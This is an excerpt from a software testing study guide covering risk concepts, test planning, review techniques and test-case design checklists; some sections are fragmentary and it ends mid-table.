planning is based on an understanding of the types and magnitudes of risk throughout
the software application life cycle. The objective of this skill category is to explain the
concept of risk which includes project, process, and product risk. The tester must understand
these risks in order to evaluate whether the controls are in place and working in the
development processes and within the application under test. Also, by determining the
magnitude of a risk the appropriate level of resources can be economically allocated to reduce
that risk.
This first category, software project risk, includes operational, organizational, and contractual
software development parameters. Project risk is primarily a management responsibility and
includes resource constraints, external interfaces, supplier relationships, and contract
restrictions. Other examples are unresponsive vendors and lack of organizational support.
Perceived lack of control over project external dependencies makes project risk difficult to
manage. Funding is the most significant project risk reported in risk assessments.
This second category, software process risk, includes both management and technical work
procedures. In management procedures, you may find process risk in activities such as
planning, resourcing, tracking, quality assurance, and configuration management. In technical
procedures, you may find it in engineering activities such as requirements analysis, design,
code, and test. Planning is the management process risk most often reported in risk
assessments. The technical process risk most often reported is the development process.
This third category, software product risk, contains intermediate and final work product
characteristics. Product risk is primarily a technical responsibility. Product risks can be found
in the requirements phase, analysis and design phase, code complexity, and test specifications.
Because software requirements are often perceived as flexible, product risk is difficult to
manage. Requirements are the most significant product risks reported in product risk
assessments.
Risk is the potential loss to an organization, for example, the risk resulting from the misuse of
computer resources. This may involve unauthorized disclosure, unauthorized modification,
and/or loss of information resources, as well as the authorized but incorrect use of computer
systems. Risk can be measured by performing risk analysis.
Risk Event is a future occurrence that may affect the project for better or worse. The positive
aspect is that these events will help you identify opportunities for improvement while the
negative aspect will be the realization of threats and losses.
Risk Exposure is the measure that determines the probability of likelihood of the event times
the loss that could occur.
Risk Management is the process required to identify, quantify, respond to, and control
project, process, and product risk.
Risk Appetite defines the amount of loss management is willing to accept for a given risk.
Active Risk is risk that is deliberately taken on. For example, the choice to develop a new
product that may not be successful in the marketplace.
Passive Risk is that which is inherent in inaction. For example, the choice not to update an
existing product to compete with others in the marketplace.
Risk Acceptance is the amount of risk exposure that is acceptable to the project and the
company and can be either active or passive.
Risk Identification is a method used to find risks before they become problems. The risk
identification process transforms issues and concerns about a project into tangible risks, which
can be described and measured.
Inherent Risk is the risk to an organization in the absence of any actions management might
take to alter either the risk’s likelihood or impact.
Residual Risk is the risk that remains after management responds to the identified risks.
Control is anything that tends to cause the reduction of risk. Control can accomplish this by
reducing harmful effects or by reducing the frequency of occurrence.
A risk is turned into a loss by threat. A threat is the trigger that causes the risk to become a
loss. For example, if fire is a risk, then a can of gasoline in the house or young children
playing with matches are threats that can cause the fire to occur. While it is difficult to deal
with risks, one can deal very specifically with threats.
Threats are reduced or eliminated by controls. Thus, control can be identified as anything that
tends to cause the reduction of risk. In our fire situation, if we removed the can of gasoline
from the home or stopped the young children from playing with matches, it would have
eliminated the threat and thus, reduced the probability that the risk of fire would be realized.
The process of evaluating risks, threats, controls, and vulnerabilities is frequently called risk
analysis. This is a task that the tester performs when he/she approaches the test planning from
a risk perspective.
Risks, which are always present in a application environment, are triggered by a variety of
threats. Some of these threats are physical–such as fire, water damage, earthquake, and
hurricane. Other threats are people-oriented–such as errors, omissions, intentional acts to
disrupt system integrity, and fraud. These risks cannot be eliminated, but controls can reduce
the probability of the risk turning into a damaging event. A damaging event is the
materialization of a risk to an organization’s assets.
5
Test Planning
T
esters need specific skills to plan tests and to select appropriate techniques and
methods to validate a software application against its approved requirements and
design. In Skill Category 3, “Managing the Test Project,” test planning was shown to
be part of the test administration processes. In Skill Category 4, “Risk in the SDLC,”
the assessment and control of risk was discussed in detail. Specific to testing, risk assessment
and control is an integral part of the overall planning process. Having assessed the risks
associated with the software application under test, a plan to minimize those risks can be
created. Testers must understand the development methods and operating environment to
effectively plan for testing.
The test plan serves two specific purposes: a contract and a roadmap.
Second, the test plan acts as a roadmap for the test team. The plan describes the approach the
team will take, what will be tested, how testing will be performed, by whom, and when to stop
testing. The roadmap reflects the tactical activities to be accomplished and how they will be
accomplished. By clearly identifying the activities, the plan creates accountability on the part
of the test team to execute the plan and to ensure that objectives are met.
Acceptance criteria will likely evolve from high level conceptual acceptance criteria to more
detailed product level criteria. The details might manifest themselves in the form of Use Cases
or, in an Agile project clear, concise User Stories. Regardless, it is critical that before the plan
begins we understand where we are going.
5.2.3 Assumptions
In developing any type of plan, certain assumptions exist. For example, if a mobile application
under test required a newly developed smartphone platform, an assumption could be that the
hardware would be available on a specific date. The test plan would then be constructed based
on that assumption. It is important that assumptions be documented for two reasons. First to
assure that they are effectively incorporated into the test plan, and second, so that they can be
monitored should the event included in the assumption not occur. For example, hardware that
was supposed to be available on a certain date will not be available until three months later.
This could significantly change the sequence and type of testing that occurs.
Some organizations divide individuals into four categories when attempting to identify issues.
These categories are:
• Those who will make the software system happen
• Those who will hope the software system happens
• Those who will let the software system happen
• Those who will attempt to make the software system not happen
If the stakeholders are divided among these four categories, issues are frequently apparent.
For example, if two different business units want to make the software system happen, a
decision would have to be made as to which would have primary responsibility and which
would have secondary responsibility. If both want to have primary responsibility, conflict will
occur.
5.2.5 Constraints
As described earlier, the test plan is both a contract and a roadmap. For both the contract to be
met and the roadmap to be useful, it is important that the test plan be realistic. Constraints are
those items that will likely force a dose of “reality” on the plan. The obvious constraints are
test staff size, test schedule, and budget. Other constraints can include the inability to access
user databases for test purposes, limited access to hardware facilities for test purposes, and
minimal user involvement in development of the test plan and testing activities.
Because constraints restrict the ability of testers to test effectively and efficiently, the
constraints must be documented and integrated into the test plan. It is also important that the
end users of the software understand the constraints placed on testers and how those
constraints may impact the role and responsibility of software testers in testing the application
system.
1. Define what it means to meet the project objectives. These are the objectives to be
accomplished by the project team.
2. Understand the core business areas and processes. All information systems are not
created equal. Systems that support mission-critical business processes are clearly more
important than systems for mission-support functions (usually administrative),
although these, too, are necessary. Focusing on core business areas and processes is
essential to the task of assessing the impact of the problem and for establishing the
priorities for the program.
3. Assess the severity of potential failures. This must be done for each core business area
and its associated processes.
4. Identify the components for the system
Links to core business areas or processes
Platform languages and database management systems
Operating system software and utilities
Telecommunications
Internal and external interfaces
Owners
Availability and adequacy of technical documentation
5. Assure requirements are testable. Effective testing cannot occur if requirements cannot
be tested to determine if they are implemented correctly.
6. Address implementation schedule issues.
Implementation checkpoints
Schedule of implementation meetings
7. Identify interface and data exchange issues including the development of a model
showing the internal and external dependency links amongst core business areas,
processes, and information systems.
8. Evaluate contingency plans for the application. These should be realistic contingency
plans, including the development and activation of manual or contract procedures, to
ensure the continuity of core business processes.
One the left side of the “V” are primarily the verification or static tests and on the right side of
the “V” are the validation or dynamic tests. These levels of testing include:
• Verification or static tests
Requirements reviews
Design reviews
Code walkthroughs
Code inspections
• Validation or dynamic tests
Unit testing
Integration testing
System testing
User acceptance testing
These testing levels are part of the Software Quality Assurance V&V processes. Many
organizations have discrete plans as depicted in Figure 5-2, while others may incorporate all
testing activities, both static and dynamic into one test plan. The complexity of this hierarchy
may be driven by the development model, the size and complexity of the application under
test, or the results of the risk assessment and control processes described in Skill Category 4.
The example test plans described in the following sections will incorporate several of the
plans as shown in Figure 5-2 and represents common test plan structures.
“The act of designing tests is one of the most effective error prevention
mechanisms known…
The thought process that must take place to create useful tests can discover and
eliminate problems at every stage of development.”
Boris Beizer
There is no one right way to plan tests. The test planning process
and the subsequent test plan must reflect the type of project, the
Terminology
type of development model, and other related influencers. Repeatable
However, there are recognized international standards for the
Controllable
format of test plans which can serve as a good starting point in the
development of a test plan standard for an organization. As noted in Coverage
Skill Category 1, section 1.4, ISO/IEC/IEEE 29119-3 (replaces
IEEE 829) defines templates for test documentation covering the
entire software testing life cycle. Within the section on Test Management Process
Documentation is the Test Plan standard. The material found in this section will reflect some
of the IEEE standards along with other good practices. This section will also include “how-to”
information in order to help understand the components of the software test plan.
The test plan describes how testing will be accomplished. Its creation is essential to effective
testing. If the plan is developed carefully, test execution, analysis, and reporting will flow
smoothly. The time spent in developing the plan is well worth the effort.
The test plan should be an evolving document. As the development effort changes in scope,
the test plan must change accordingly. It is important to keep the test plan current and to
follow it. It is the execution of the test plan that management must rely on to ensure that
testing is effective. Also, from this plan the testers ascertain the status of the test effort and
base opinions on the results of the test effort.
Test planning should begin as early in the development process as possible. For example, in a
waterfall development project planning would begin at the same time requirements definition
starts. It would be detailed in parallel with application requirements and during the analysis
stage of the project the test plan defines and communicates test requirements and the amount
of testing needed so that accurate test estimates can be made and incorporated into the project
plan. Regardless of the development methodology, planning must take place early in the life
cycle and be maintained throughout.
The test plan should define the process necessary to ensure that the tests are repeatable,
controllable, and ensure adequate test coverage when executed.
Repeatable - Once the necessary tests are documented, any test team member should be able
to execute the tests. If the test must be executed multiple times, the plan ensures that all of the
critical elements are tested correctly. Parts or the entire plan can be executed for any necessary
regression testing.
Controllable - Knowing what test data is required, when testing should be run, and what the
expected results are all documented to control the testing process.
Coverage - Based on the risks and priorities associated with the elements of the application
system, the test plan is designed to ensure that adequate test coverage is built into the test. The
plan can be reviewed by the appropriate parties to ensure that all are in agreement regarding
the direction of the test effort.
The development of an effective test plan involves the following tasks that are described
below.
• Set test objectives
Test objectives need to be defined and agreed upon by the test team. These objectives must be
measurable and the means for measuring defined. In addition, the objectives must be
prioritized.
Test objectives should restate the project objectives from the project plan. In fact, the test plan
objectives should determine whether those project plan objectives have been achieved. If the
project plan does not have clearly stated objectives, then the testers must develop their own
by:
• Setting objectives to minimize the project risks
• Brainstorming to identify project objectives
• Relating objectives to the testing policy, if established
The testers must have the objectives confirmed as the project objectives by the project team.
When defining test objectives, ten or fewer test objectives are a general guideline; too many
distract the tester’s focus. To define test objectives testers need to:
• Write the test objectives in a measurable statement, to focus testers on accomplishing
the objective.
• Assign a priority to the objectives, such as:
High – The most important objectives to be accomplished during testing.
Average – Objectives to be accomplished only after the high-priority test
objectives have been accomplished.
Low – The least important test objectives.
Note: Establish priorities so that approximately one-third are high, one-third are average,
and one-third are low.
• Define the acceptance criteria for each objective. This should state, quantitatively, how
the testers would determine whether the objective has been accomplished. The more
specific the criteria, the easier it will be for the testers to determine whether it has been
accomplished.
At the conclusion of testing, the results of testing can be consolidated upward to determine
whether or not the test objective has been accomplished.
Two of the essential items in the test plan are the functions to be tested (scope) and how
testing will be performed. Both will be clearly articulated in the formal plan. Creating the test
matrix is the key process in establishing these items. The test matrix lists which software
functions must be tested and the types of tests that will test those functions. The matrix shows
“how” the software will be tested using checkmarks to indicate which tests are applicable to
which functions. The test matrix is also a test “proof.” It proves that each testable function has
at least one test, and that each test is designed to test a specific function.
An example of a test matrix is illustrated in Table 5-1. It shows four functions in a payroll
system, with four tests to validate them. Since payroll is a batch system where data is entered
all at one time, test data is also batched using various dates. The parallel test is run when
posting to the general ledger, and all changes are verified through a code inspection.
The general information is designed to provide background and reference data on testing. In
many organizations this background information will be necessary to acquaint testers with the
project. Incorporated into the general information are the administrative components of the
test plan which identify the schedule, milestones, and resources needed to execute the test
plan. The test administration is sometimes referred to as the “business plan” part of the test
plan in that it does not describe what or how to test but rather details the infrastructure of the
test project. Included in the general information and test administration are:
• Definitions (vocabulary of terms used in the test plan document)
• References
Document Map
Project Plan
Requirements specifications
High Level design document
Detail design document
Additional Reference Documents
Development and Test process standards
Methodology guidelines and examples
Testing is complete when the test team has fully executed the test plan.
Test planning can be one of the most challenging aspects of testing. The following guidelines
can help make the job a little easier.
• Start early
Even though all of the details may not yet be available, a great deal of the planning
effort can be completed by starting on the general and working toward the specific.
Starting early affords the opportunity to identify resource needs and plan for them
before other areas of the project subsume them.
• Keep the Test Plan flexible
Test projects are very dynamic. The test plan itself should be changeable but subject to
change control. Change tolerance is a key success factor in the development models
commonly used.
• Review the Test Plan frequently
Other people’s observations and input greatly facilitate achieving a comprehensive test
plan. The test plan should be subject to quality control just like any other project
deliverable.
• Keep the Test Plan concise and readable
The test plan does not need to be large and complicated. In fact, the more concise and
readable it is, the more useful it will be. Remember, the test plan is intended to be a
communication document. The details should be kept in a separate reference
document.
• Spend the time to do a complete Test Plan
The better the test plan, the easier it will be to execute the tests.
There is no one universally accepted standard for test planning. However, there is great
consistency between the different organizations that have defined a test plan standard. This
section will begin with a discussion of what is normally contained in a test plan and then
provide an example of a test plan standard that is consistent with the test plan standards
provided by major standard-setting bodies such as the International Standards Organization
(ISO), Institute of Electrical and Electronics Engineers (IEEE), International Electrotechnical
Commission (IEC), and National Institute of Standards in Technology (NIST).
Test Plans and their formats vary from company to company, but the best examples contain
most of the elements discussed here. Several test plan outlines will be provided to demonstrate
the various components of different plans.
• Test Environment
• Communication Approach
• Test Tools
A test objective is simply a testing “goal.” It is a statement of what the tester is expected to
accomplish or validate during a specific testing activity. Test objectives:
• Guide the development of test cases, procedures, and test data.
• Enable the tester and project managers to gauge testing progress and success.
• Enhance communication both within and outside of the project team by helping to
define the scope of the testing effort.
Each objective should include a high-level description of the expected test results in
measurable terms and should be prioritized. In cases where test time is cut short, test cases
supporting the highest priority objectives would be executed first.
5.4.2.2.1.3 Assumptions
These assumptions document test prerequisites, which if not met, could have a negative
impact on the test. The test plan should document the risk that is introduced if these
expectations are not met. Examples of assumptions include:
• Skill level of test resources
• Test budget
• State of the application at the start of testing
• Tools available
• Availability of test equipment
Although the test manager should work with the project team to identify risks to the project,
this section of the plan documents test risks and their possible impact on the test effort. Some
teams may incorporate these risks into project risk documentation if available. Risks that
could impact testing include:
• Availability of downstream application test resources to perform system integration or
regression testing
This section of the test plan defines who is responsible for each stage or type of testing. A
responsibility matrix is an effective means of documenting these assignments.
The test plan should be viewed as a sub-plan of the overall project plan. It should not be
maintained separately. Likewise, the test schedule and planned resources should also be
incorporated into the overall Project Plan. Test resource planning includes:
• People, tools, and facilities
• An analysis of skill sets so that training requirements can be identified
This section of the plan defines the data required for testing, as well as the infrastructure
requirements to manage test data. It includes:
• Methods for preparing test data
• Backup and rollback procedures
• High-level data requirements, data sources, and methods for preparation (production
extract or test data generation)
• Whether data conditioning or conversion will be required
• Data security issues
Environment requirements for each stage and type of testing should be outlined in this section
of the plan, for example:
In the complex, environment required for software testing in most organizations, various
communication mechanisms are required. These mechanisms should include:
• Formal and informal meetings
• Working sessions
• Processes, such as defect tracking
• Tools, such as issue and defect tracking, electronic bulletin boards, notes databases,
and Intranet sites
• Techniques, such as escalation procedures or the use of white boards for posting the
current state of testing (e.g., test environment down)
• Miscellaneous items such as project contact lists and frequency of defect reporting
5.4.2.2.1.11 Tools
Any tools that will be needed to support the testing process should be included here. Tools are
usually used for:
• Workplan development
• Test planning and management
• Configuration management
• Test script development
• Test data conditioning
• Test execution
• Automated test tools
• Stress/load testing
• Results verification
• Defect tracking
The information outlined here cannot usually all be completed at once but is captured in
greater levels of detail as the project progresses through the life cycle.
The test plan components shown below follow the IEEE 829 standard closely. While the order
may be different, the areas covered by the plans are quite similar. Only the outline list is
provided here, for specific descriptions, visit the ISO 29119 site at:
www.softwaretestingstandard.org.
1. References
2. Introduction
3. Test Items
4. Software Risk Issues
5. Features to be Tested
6. Features not to be Tested
7. Approach
8. Item Pass/Fail Criteria
9. Suspension Criteria and Resumption Requirements
10. Test Deliverables
11. Remaining Test Tasks
12. Environmental Needs
13. Staffing and Training Needs
14. Responsibilities
15. Schedule
16. Planning Risks and Contingencies
17. Approvals
18. Glossary
This example plan uses the case of an application system used in a hospital. The detailed test
plan is included as Appendix B.
DOCUMENT CONTROL
Control
Abstract
Distribution
History
TABLE OF CONTENTS
1. GENERAL INFORMATION
1.1. DEFINITIONS
1.2. REFERENCES
1.2.1. Document Map
1.2.2. Test Directory Location
1.2.3. Additional Reference Documents
1. Make the necessary changes to the test plan to allow the test team to fully execute the
modified plan and be in compliance with the project changes. Examples might be:
a. Reprioritize the test objectives moving some objective out of scope
b. Reprioritizing test cases moving some tests out of scope
c. Move some modules out of scope in the plan
d. Review resources and reallocate as necessary
2. Document, in the modified plan, the changes to the risk assessment and noting the
necessary adjustments to risk control mechanisms.
3. All relevant stakeholders must sign off on the modified plan.
6
Walkthroughs, Checkpoint
Reviews, and Inspections
T
he principle of integrated quality control throughout the development life cycle is a
recurring theme in Software Testing Body of Knowledge (STBOK). Section 1.8 of
Skill Category 1 described the different activities involved with full life cycle testing.
Section 1.8.2.1 defines verification testing along with providing several examples. In
this skill category, an in depth discussion about these verification techniques is provided.
A review is a quality control technique that relies on individuals other than the author(s) of the
deliverable (product) to evaluate that deliverable. The purpose of the review is to find errors
before the deliverable; for example, a requirements document is delivered either to the
customer or the next step of the development cycle.
Review tasks should be included in the project plan. Reviews should be considered activities
within the scope of the project and should be scheduled and resources allocated just like any
other project activity.
Reviews, which emphasize the quality of the products produced, can be performed throughout
the SDLC ensuring that the “quality” factor is given as much priority as the other three.
Finding and correcting defects soon after they are introduced not only prevents ‘cascading’
defects later in the life cycle but also provides important clues regarding the root cause of the
defect, which explains how and why the defect happened in the first place.
Because reviews are performed throughout the life cycle, they support these approaches in
two ways: they add user perspective at various points during development and they stop
unwanted/wrong functions from being developed.
6.2.2 Walkthroughs
Informal reviews are usually conducted by the author of the product under review.
Walkthroughs do not require advance preparation. Walkthroughs are typically used to confirm
understanding, test ideas, and brainstorm.
The walkthrough process consists of three steps. The first step involves selecting the
walkthrough participants; the second step is the review meeting or “walk through”; and the
third step involves using the results.
The Checkpoint Review process consists of two phases. The first phase is a planning phase
which occurs at the beginning of each project that has been targeted for checkpoint reviews in
which the checkpoints are identified. The second phase includes the steps for conducting a
checkpoint review. This phase is iterated for each checkpoint review held during the project.
Figure 6-3 illustrates the planning phase and the iterative “checkpoint” phase.
6.2.4 Inspections
Inspections are used to review an individual product and to evaluate correctness based on its
input criteria (specifications).
The inspection has six steps. The first three steps involve the inspection team prior to the
actual review meeting. The fourth step is the inspection of the product. The fifth step is
performed by the producer after the product has been reviewed or “inspected.” The last step
assures that the inspection findings have been addressed in the product. Figure 6-4 illustrates
the inspection process.
6.3.5 Training
People cannot conduct effective reviews unless they are trained in how to do it! Provide initial
concepts, overview, and skills training as well as ongoing follow-up coaching.
6.4 Summary
It has been stated continuously throughout the STBOK that the most effective approach to
managing the cost of defects is to find them as early as possible. Walkthroughs, checkpoint
reviews, and inspections, which are often collectedly referred to as “reviews,” are the techniques
for delivering this early detection. Reviews emphasize quality throughout the development process,
involve users/customers, and permit ‘midcourse’ corrections.
7
Designing Test Cases
T he test objectives established in the test plan should be decomposed into individual
test conditions, then further decomposed into individual test cases and test scripts. In
Skill Category 5, the test plan included a test matrix that correlates a specific software
function to the tests that will be executed to validate that the software function works as
specified.
When the objectives have been decomposed to a level that the test case can be developed, a set
of tests can be created which will not only test the software during development, but can test
changes during the operational state of the software.
It is a common practice to use the system specifications (e.g., requirements documents, high
level design documents) as the primary source for test conditions. After all, the system
specifications are supposed to represent what the application system is going to do. The more
specific the documents are the better the test conditions. However, as was noted in Skill
Category 4, (Risk) section 4.1.1.3 “Requirements are the most significant product risks
reported in product risk assessments.” The concern is that if we rely too heavily on system
specifications, namely the requirements documentation, we will likely miss significant
conditions that must be tested. To help mitigate that risk, the application under test must be
viewed from as many perspectives as possible when identifying the test conditions.
When identifying test conditions for the application under test, there are five perspectives that
should be utilized to ferret out as many testable conditions as possible and to reduce the risk of
missing testable conditions. These five perspectives are:
It is important to follow a logical process when identifying test conditions. This is not to say
that ad hoc approaches such as Exploratory Testing (see section 1.9.2.4) are not used or useful
when identifying test conditions. Quite the contrary, the process of identifying testable
conditions is precisely the process of exploring the application from a variety of viewpoints.
As testable conditions are discovered they provide more information about the application and
this knowledge uncovers more testable conditions. Software applications can be very complex
and the risks associated with missing testable conditions are high.
• processing functions
• timings
• validations
If you plan to use production data for test purposes, population analysis is a technique used to
identify the kinds and frequency of data that will be found in the production environment.
Population analysis is creating reports that describe the type, frequency, and characteristics of
the data to be used in testing. For example, for numerical fields, one might want to know the
range of values of data contained in that field; for alphabetic data, one may want to know the
longest name in a data field; for codes, one may want to know what codes and their frequency
of use.
Testers will benefit from using population analysis in the following ways:
• Identification of codes/values being used in production which were not indicated in
the software specification
• Unusual data conditions, such as a special code in a numeric field
• Provides a model for use in creating test transactions/test scripts
• Provides a model for the type and frequency of transactions that should be created for
stress testing
• Helps identify incorrect transactions for testing error processing/error handling
routines
Population analysis is best performed using a software tool designed to perform ad hoc reports
on a database. It can be performed manually but rarely does that permit the full analysis of
large-volume files.
There are three types of population analyses you may wish to perform.
2. Screen population analysis - The objective of this is to identify all of the screens that
will be used by the application under test, and to gather some background data about
each screen (i.e., take screen shots and document).
The 13 types of transactions are listed and briefly described on the following pages. For each
transaction type the test concern is explained, the area responsible for developing those
transaction types is listed, and an approach describing how to create test data of that type is
included. The first two transaction types, field and record, include a list of questions to ask
when looking for testable conditions. A full list of questions that could be asked for all
thirteen types are included as Appendix C.
Testers never have enough time to create all the test data needed. Thus, there will be tradeoffs
between the extensiveness of the test conditions in each category. Using the tester’s
background and experience, the results of interaction with end users/project personnel, and
the risk assessment, the tester should indicate for each transaction type whether it is high,
medium, or low importance. These are of relative importance, meaning that approximately
one-third of all transaction types should be high, one-third, medium, and one-third, low. The
purpose of this is to indicate to those creating test conditions where emphasis should be
placed.
This test is limited to a specific field/data element. The purpose is to validate that all of the
processing related to that specific field is performed correctly. The validation will be based on
the processing specifications for that specific field. However, it will be limited to that specific
field and does not include a combination or interrelationship of the field being tested with
other fields.
The major concern is that the specifications relating to processing of a single field/data
element will not have been implemented correctly. The reason for this is the error of omission.
Specific field conditions properly documented in requirements and design may not have been
correctly transferred to program specifications, or properly implemented by the programmer.
The concern is one of accuracy of implementation and completeness of program
specifications for the specific field.
The owner of the field is responsible for the accuracy/completeness of processing for the field.
The tester may want to verify with the owner that the number of conditions to validate the
accuracy/completeness of field processing is complete.
The following three-step approach is recommended to develop the test conditions for a field:
7.1.3.2.4 Examples
Field edits, field updates, field displays, field sizes, and invalid values processing are
examples.
# Item
1. Have all codes been validated?
2. Can fields be properly updated?
3. Is there adequate size in the field for the accumulation of
totals?
4. Can the field be properly initialized?
5. If there are restrictions on the contents of the field, are
those restrictions validated?
6. Are rules established for identifying and process invalid
field data?
a. If no, develop this data for the error-handling
transaction type.
b. If yes, have test conditions been prepared to validate
the specification processing for invalid field data?
7. Have a wide range of normal valid processing values
been included in the test conditions?
8. For numerical fields, have the upper and lower values
been tested?
9. For numerical fields, has a zero value been tested?
10. For numerical fields, has a negative test condition been
prepared?
11. For alphabetical fields, has a blank condition been
prepared?
12. For an alphabetical/alphanumeric field, has a test
condition longer than the field length been prepared?
(The purpose is to check truncation procession).
13. Have you verified from the data dictionary that all valid
conditions have been tested?
14. Have you reviewed systems specifications to determine
that all valid conditions have been tested?
15. Have you reviewed requirements to determine all valid
conditions have been tested?
16. Have you verified with the owner of the data element that
all valid conditions have been tested?
These conditions validate that records can be properly created, entered, processed, stored, and
retrieved. The testing is one of occurrence, as opposed to correctness. The objective of this
test is to check the process flow of records through applications.
The primary concern is that records will be lost during processing. The loss can occur prior to
processing, during processing, during retention, or at the output point. Note that there is a
close relationship between record loss and control. Control can detect the loss of a record,
while testing under this transaction type has as its objective to prevent records from being lost.
The creation of record tests requires some sort of data flow diagram/data model in order to
understand the logical flow of data. The creation of record transaction type test conditions is a
three-step process, as follows:
7.1.3.3.4 Examples
First and last records, multiple records, and duplicate records.
# Item
1. Has a condition been prepared to test the processing of
the first record?
2. Has a condition been determined to validate the
processing of the last record?
3. If there are multiple records per transaction, are they all
processed correctly?
4. If there are multiple records on a storage media, are they
all processed correctly?
5. Can two records with the same identifier be processed
(e.g., two payments for the same accounts receivable
invoice number)?
# Item
6. Can the first record stored be retrieved?
7. Can the last record stored be retrieved?
8. Will all of the records entered be properly stored?
9. Can all of the records stored be retrieved?
10. Do interconnecting modules have the same identifier for
each record type?
11. Are record descriptions common throughout the entire
software system?
12. Do current record formats coincide with the formats used
on files created by other systems?
These conditions validate that all needed files are included in the system being tested and that
the files will properly interconnect with the modules that need data from those files. Note that
file is used in the context that it can be any form of file or database table.
The test concern is in the areas normally referred to as integration and system testing. It is
determining that the operating environment has been adequately established to support the
application’s processing. The concerns cover the areas of file definition, creation of files, and
the inter-coupling of the files with and between modules. Note that file conditions will also be
covered under the transaction types of search, match/merge, and states.
Some of the file test conditions must be done by the developers during Unit testing. However,
it is a good idea for everyone involved in testing the application be aware of these test
transaction types. Rarely would end users/customers have the ability to understand or validate
file processing.
The preparation for file testing is very similar to the preparation performed by system
programmers to create the file job control. However, the testers are concerned with both the
system aspect of testing (i.e., job control works) and the correct interaction of the files with
the modules. Note that software that does not use job control has equivalent procedures to
establish interaction of the file to the modules.
The following three-step process will create the conditions necessary to validate file
processing:
7.1.3.4.4 Examples
The objective of this test transaction category is to test relationships between data elements.
Note that record and file relationships will be tested in the match/merge transaction type.
Relationships will be checked both within a single record, and between records. Relationships
can involve two or more fields. The more complex the relationship, the more difficult
“relationship” testing becomes.
The individual owners of the related data elements jointly share responsibility for relationship
checking. They should understand the relationships and be able to verify the completeness of
relationships checking.
7.1.3.5.4 Examples
Values limit values, date and time limit values, absence-absence, presence-presence, and
values out of line with the norm.
This condition tests for errors in data elements, data element relationships, records and file
relationships, as well as the logical processing conditions. Note that if error conditions are
specified, then the test for those would occur under the test transaction type indicated. For
example, if the specifications indicated what was to happen if there were no records on a file,
then under the file transaction type an error test condition would be included. However, if
error condition processing is not specified, then this category would be all-inclusive for the
non-specified conditions.
There is a major test concern that the system will be built to handle normal processing
conditions and not handle abnormal processing conditions appropriately.
2. Conduct brainstorming sessions with project personnel for structural error conditions
7.1.3.6.4 Examples
This condition tests the ability of the end user to effectively utilize the system. It includes both
an understanding of the system outputs, as well as the ability of those outputs to lead to the
correct action. This requires the tester to go beyond validating specifications to validating that
the system provides what is needed to lead the end user to the correct business action.
Two major concerns are addressed by these test conditions. The first is that the end user of the
system will not understand how the system is to be used, and thus will use it incorrectly. The
second concern is that the end user will take the wrong action based on the information
provided by the system. For example, in a bank, a loan officer may make a loan based on the
information provided, when in fact a loan officer should not have made the loan.
The end user/customer has ultimate responsibility for these test conditions. However, the
tester understanding the process used to develop the information delivered to the end user
should have a secondary responsibility to assist the end user in preparing these test conditions.
The test approach for this condition requires the identification of the business actions taken.
They then must be related to the information to determine that the information leads to the
logical business action. This test tends to be a static test, as opposed to a dynamic test. It is a
four-step process, as follows:
1. Identify the business actions
3. Indicate the relationship between the system output and the business action taken
7.1.3.7.4 Examples
Inventory screen used to communicate quantity on hand, credit information aides in the loan
approval process, and customer inquiry provides phone number for payment follow-up.
Search capabilities involve locating records, fields, and other variables. The objective of
testing search capabilities is to validate that the search logic is correct. Search activities can
occur within a module, within a file, or within a database. They involve both simple searches
(i.e., locating a single entity) or complex searches (e.g., finding all of the accounts receivable
balances over 90 days old). Searches can be preprogrammed or special-purpose searches.
There are two major concerns over search capabilities. The first is that the preprogrammed
logic will not find the correct entity, or the totality of the correct entities. The second is that
when "what if” questions are asked the application will not support the search.
The functional test team and users of the information (during UAT) are responsible to validate
that the needed search capabilities exist, and function correctly. However, because this
involves both functionality and structure, the development team has a secondary
responsibility to validate this capability.
Two approaches are needed for testing the search capabilities. The first is validating that the
existing logic works and the second is verifying that the “what if” questions can be answered
by expending reasonable effort.
There are four steps needed to test the search capabilities, as follows:
7.1.3.8.4 Examples
File search for a single record, file search for multiple records, multiple condition searches
(e.g., customers in USA only with over $1 million in purchases), and table searches.
Matching and merging are various file processing conditions. They normally involve two or
more files, but may involve an input transaction and one or more files, or an input transaction
and an internal table. The objective of testing the match/merge capabilities is to ensure that all
of the combinations of merging and matching are correctly addressed. Generally, merge
inserts records into a file or combines two or more files; while match searches for equals
between two files.
The responsibility for correct matching and merging resides with the designers of the
application system. They should create the logic that permits all of the various conditions to
be performed. Testers must validate that the logic is correct.
7.1.3.9.4 Examples
Stress testing is validating the performance of application system when subjected to a high
volume of transactions. Stress testing has two components. One is a large volume of
transactions; and the second is the speed at which the transactions are processed (also referred
to as performance testing which covers other types like spike and soak testing). Stress testing
can apply to individuals using the system, the communications capabilities associated with the
system, as well as the system's capabilities itself. Any or all of these conditions can be stress
tested.
The major test concern is that the application will not be able to perform in a production
environment. Stress testing should simulate the most hectic production environment possible.
Stress testing is an architectural/structural capability of the system. The system may be able to
produce the right results but not at the performance level needed. Thus, stress test
responsibility is a development team responsibility.
4. Develop test conditions to stress the features that have a direct contribution on system
performance
7.1.3.10.4 Examples
Website function response time, report turnaround time, and mobile application response
time.
Control testing validates the adequacy of the system of internal controls to ensure accurate,
complete, timely, and authorized processing. These are the controls that are normally
validated by internal and external auditors in assessing the adequacy of control. A more
detailed discussion of Testing Controls can be found in Skill Category 8.
Controls in this context are application controls, and not management controls. The concern is
that losses might accrue due to inadequate controls. The purpose of controls is to reduce risk.
If those controls are inadequate, risk exists, and thus loss may occur.
Senior management and end user/customer management bear primary responsibility for the
adequacy of controls. Some organizations have delegated the responsibility to assess control
to the internal audit function. Others leave it to the testers and project personnel to verify the
adequacy of the system of internal control.
Testing the adequacy of controls is complex. For high-risk financial applications, testers are
encouraged to involve their internal auditors.
A four-step procedure is needed to develop a good set of control transaction tests, as follows:
7.1.3.11.4 Examples
Attributes are the quality and productivity characteristics of the software being tested. They
are independent of the functional aspects, and primarily relate to the architectural structural
aspects of a system. Attribute testing is complex and often avoided because it requires
innovative testing techniques. However, much of the dissatisfaction expressed about software
by end users/customers relates to attributes rather than functions. In Skill Category 1, section
1.2.5, Software Quality Factors and Software Quality Criteria were explained. Attribute
testing relates to that discussion. Table 7-4 lists those Attributes with a few additions.
Attribute Description
CORRECTNESS Assurance that the data entered, processed, and output by
the application system is accurate and complete.
Accuracy and completeness are achieved through
controls over transactions and data elements. The control
should commence when a transaction is originated and
conclude when the transaction data has been used for its
intended purpose.
FILE Assurance that the data entered into the application
INTEGRITY system will be returned unaltered. The file integrity
procedures ensure that the right file is used and that the
data on the file and the sequence in which the data is
stored and retrieved is correct.
AUTHORIZATIO Assurance that data is processed in accordance with the
N intents of management. In an application system, there is
